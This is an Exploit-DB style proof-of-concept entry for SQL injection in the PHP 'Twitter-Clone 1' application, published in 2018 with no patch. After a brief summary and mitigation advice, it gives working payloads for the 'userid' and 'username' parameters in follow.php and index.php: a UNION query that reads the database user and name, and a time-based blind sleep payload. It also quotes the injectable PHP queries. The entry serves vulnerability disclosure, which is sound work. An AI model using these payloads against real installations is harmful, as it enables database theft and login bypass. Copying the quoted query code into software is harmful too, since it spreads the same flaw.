Twitter-Clone 1 - 'userid' SQL Injection

vendor:

Twitter-Clone

by:

L0RD

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Twitter-Clone

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE:

CPE: a:fyffe:php-twitter-clone:1

Metasploit:

Other Scripts:

Platforms Tested: Windows 10

2018

Twitter-Clone 1 – ‘userid’ SQL Injection

The Twitter-Clone 1 application is vulnerable to SQL Injection in the 'userid' parameter in the 'follow.php' and 'index.php' files. An attacker can exploit this vulnerability to execute arbitrary SQL queries and potentially gain unauthorized access to the database.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper input validation and parameterized queries to prevent SQL Injection attacks. Regular security audits and code reviews should also be conducted to identify and fix any potential vulnerabilities.

Source

Exploit-DB raw data:

# Exploit Title: Twitter-Clone 1 - 'userid' SQL Injection
# Date: 2018-08-21
# Exploit Author: L0RD
# Vendor Homepage: https://github.com/Fyffe/PHP-Twitter-Clone/
# Version: 1
# CVE: N/A
# Tested on: Win 10

# POC : SQLi
# vulnerable files : follow.php , index.php
# vulnerable parameters : userid , username

# 1) follow.php :

# Parameters : userid , username
# Type : Union query
# Type : Time-based blind
# Payloads :

userid: ' UNION SELECT 1,2,user(),4,database(),6,7%23
username: ' AND sleep(10)%23

# vulnerable code :

if($_GET['userid']  && $_GET['username']){
if($_GET['userid']!=$user_id){
$follow_userid = $_GET['userid'];
$follow_username = $_GET['username'];
include 'connect.php';
$query = mysqli_query($con, "SELECT id
    FROM following
WHERE user1_id='$user_id' AND user2_id='$follow_userid'
");

# 2) index.php :

# vulnerable parameter : username
# Type : Union query
# Payload : 

' union select 1,2,user(),4,5,6

# vulnerable code :

if($_POST['login-btn']=="login-submit"){
if($_POST['username'] != "" && $_POST['password'] != ""){
$username = strtolower($_POST['username']);
include "connect.php";
$query = mysqli_query($con, "SELECT id, password
FROM users
 WHERE username='$username'");